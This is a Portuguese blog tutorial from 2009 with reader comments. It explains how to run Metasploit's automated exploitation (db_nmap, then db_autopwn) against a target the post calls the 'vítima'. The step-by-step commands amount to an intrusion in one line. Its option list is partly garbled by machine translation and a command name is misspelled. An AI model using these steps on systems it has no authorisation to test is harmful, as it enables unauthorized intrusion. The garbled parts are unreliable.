auto exploraçao com metasploit

Publicado: maio 15, 2009 em ataques, DB, exploits, linux, metasploit, seguranca

Auto Exploração

Criei este post com bastante explicação para todos do meu blog. Esta é uma técnica avançada do metasploit, porem muito fácil de si fazer, Todos podem tentar que vão dar conta numa boa.

Esta explicação é para o linux, Entretanto para aqueles que usam windows… Podem ficar despreocupados, pois vou criar um tutorial de auto-exploraçao para windows.

Para quem não sabe o que é a auto exploração, vou explicar… Este é o método mais eficaz para quem quer testar sua rede ou seu próprio computador. A AUTO EXPLORAÇAO consiste em testar cada um dos exploits do seu metasploit no alvo definido pelo atacante.

Eu sei que todos já sabem o que é metasploit, por isso não vou precisar ficar dizendo toda vez que eu for criar um post sobre o metasploit, E para quem não sabe… Veja outros posts deste mesmo site.

Com Esta ferramenta avançada, “qualquer pessoa, pode testar sua própria rede, suas plataformas, sistemas operacionais e sistemas do seu computador.

O metasploit Pode ser baixado em diversos lugares, porem aconselho a baixarem do próprio site.http://metasploit.org

Vamos começar agora, já Instalando. Quem já tem instalado pode pular esta parte

Faça o download do Metasploit. Link direto ou instale do jeito que voce deseja:
http://metasploit.org/framework/downloa … 3.2.tar.gz

Agora vamos descompactar e utilizar. Entre no console, vá ao diretório que foi salvo o metasploit e faça:

$ tar -xzvf framework-3.2.tar.gz

Entre no diretório com o comando:

$ cd framework-3.1

E execute o programa, no caso o console. Com o comando:

$ ./msfconsole

Auto Exploração

A auto exploração do metasploit consiste em scans feitos na vitima e com base em portas abertas, seleciona os exploits e testa exploit por exploit. Sendo assim, depois de configurado o metasploit faria o papel de uma invasão com apenas uma linha de comando.

Vou lembrar vocês de uma coisa, VOU ensinar vocês a testarem suas rede e sistemas. NÃO USEM ESSA FERRAMENTA PARA O MAL!!!

VAMOS LÁ

Agora precisamos instalar o Postgres. De o comando:

# yum install postgres

Após a instalação do postgres é nescessario ruby. Instale o ruby e rubygems

# yum install ruby rubygems

vamos agora instalar Active Record e Postgresql.

# gem install activerecord

# gem install postgresql.

Precisamos criar agora, tabelas para serem usadas pela auto exploraçao.

As informações do servidor, portas abertas e exploits utilizados são armazenadas em um banco de dados do postgres. Certificando que o serviço Postgres esta rodando em seu sistema, vamos criar as tabelas:

# su – postgres

$ psql -d template1 -U postgres

Estamos dentro do console do postgres, aqui iremos criar nossas tabelas.

Welcome to psql 7.4.16, the PostgreSQL interactive terminal.

Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help on internal slash commands
\\g or terminate with semicolon to execute query
\\q to quit

template1=#

template1=# CREATE USER root WITH PASSWORD ‘minha senha’;
template1=# CREATE DATABASE metasploit3;
template1=# GRANT ALL PRIVILEGES ON DATABASE metasploit3 to root;
template1=# \q

Criada nossa tabela, está tudo pronto para iniciar nossa auto exploração. Inicie o metasploit.

# cd framework-3.2 //ou qual versão você estiver instalada

# ./msfconsole

Dentro do console Metasploit, digite os comandos:

. load db_postgres

. db_create (em casos de erros, ignore.)

. db_hosts

. db_nmap “ip da vitima”

Após o programa fazer o scan, O metasploit ira jogar o scaneamento para o banco de dados. AGORA VEM A MELHOR PARTE, Após o scan, execute o comando

db_autpwn -p -t –e

O Metasploit ira executar exploit por exploit.

Aqui vai alguns argumentos para o db_autopwn:

-h indica este texto de ajuda

-t Show all matching exploit modules
-x mostra todos os módulos de harmonização da façanha
-p módulos seletos baseados em portas abertos

-e Façanhas do lançamento de encontro a todos os alvos combinados
-s Obter somente um único escudo por o sistema de alvo (NON-FUNCTIONAL)
-r Use um reverso escudo para conectar
-b Use um escudo do ligamento em um porta aleatória
-I [escala] Somente anfitriões da façanha dentro desta escala
-X [escala] Exclua sempre anfitriões dentro desta escala

OBS: SI AO COMEÇAR INSTALAR O POSTGRE E DER ALGUM ERRO, PESQUISE NO GOOGLE, COMO INSTALAR POSTGRE,  DAI, SERÁ MAIS FACIL DE RESOLVER.

Fonte: Invasao

comentários
  1. Joe disse:

    Cara o camando db_host e db_namp, ao ser executado, retorna que não existe…

    poderia me ajudar?

    • Castiell disse:

      É brother,
      vc faz o seguinte..
      vc vai no shell, e digita:
      $ sudo apt-get install nmap

      depois volta para o metasploit : ./msfconsole
      e digita:

      msf> db_create client
      msf> db_nmap -sS -sV -vv -T4 -O -A ip-do-pc
      depois:
      msf> db_autopwn -p -t -e
      e espera para ver se dar certo! abração
      espero ter ajudado!

Deixe uma resposta

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s